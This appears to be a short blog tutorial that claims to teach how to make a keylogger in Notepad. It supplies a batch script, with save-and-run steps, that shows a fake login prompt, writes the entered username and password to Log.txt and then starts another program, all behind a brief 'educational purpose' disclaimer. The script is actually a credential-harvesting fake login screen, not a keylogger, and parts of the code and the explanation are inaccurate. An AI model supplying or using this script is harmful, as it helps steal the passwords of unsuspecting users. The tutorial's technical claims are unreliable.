How To Create A Keylogger In Easiest Way On Your Computer
How To Create A Keylogger In Easiest Way On Your Computer

There is a hype going on for Keylogger and we came with an amazing trick for our regular visitors. Keylogger nowadays is very common and it’s an old trick but still, some users are not aware of such tricks, still some of the other users use Keylogger software to get rid out of making any manual keylogger using notepad.

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Keylogger is a software and a text surveillance small tool which records all the keystrokes made by a user, users logging to any site to any encrypted file, the passwords as keystrokes will be recorded by a keylogger.

Warning: Using keylogger on someone’s computer is illegal. We ( are not responsible for any loss, it’s just for the educational purpose, not to harm anyone.

So you know the basic what actually a keylogger is, now without wasting time let’s create one, make sure you understand each step perfectly, if not then you can ask your question using below commenting box.

How To Make A Keylogger Using NotePad?

Creating a keylogger will only require some basic codes which are commands and notepad, you are not required to use any other special tools on this method.

Steps To Create a Keylogger From Your Notepad!

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Step1. Open your notepad in Windows computer, and paste the below codes.

@echo off
color a
title Login
echo Please Enter Your Email Address And Password
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<

Step2. Now you have to save the file, Click on ‘File’ on your notepad Top-left corner and click on ‘Save As

Step3. Now on another window as saving file, name the file as ‘Logs.bat‘ and on Save as type select All files.

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Step4. Now open your file logs.bat file from your desktop and enter the ID and password, and then just hit enter you will see a log.txt file will appear on your desktop which has recorded your User ID and Pass.

User ID and Pass
User ID and Pass

Step5. Test your logs.bat file, input those ID and pass and your logs.txt file will be updated with more IDs and Pass.

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Note: These trick will make newbies understand that how actually Keyloggers works, just make sure this is for education’s purpose and you will learn something from it.

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